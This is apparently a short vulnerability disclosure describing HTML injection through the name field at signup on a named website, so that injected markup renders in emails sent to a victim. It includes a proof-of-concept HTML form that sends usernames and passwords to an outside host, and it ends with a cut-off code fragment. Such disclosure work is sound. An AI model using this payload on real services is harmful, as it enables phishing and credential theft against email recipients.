Description

Hi i Found a way to inject html in user’s email. So in this case if a attacker set name of victim as html form it will be rendered by your system and then the render html will be sent to the victim

Proof of Concept

1. Goto https://paraio.com/signup/ and in name field add this payload

<form action=“https://brutelogic.com.br/poc.svg/” method=“post”> <label for=“username”>Username:</label> <input class=“userbox” type=“text” name=“username”/><br /> <label for=“password”>Password:</label> <input type=“text” name=“password” > <input class=“button” type=“submit” value=“submit” /> </form>

2. Enter email of victim and create new account

3. Now goto mail and check you will see our code has been rendered as html

4. Submit form and xss

// PoC.js var payload = … ```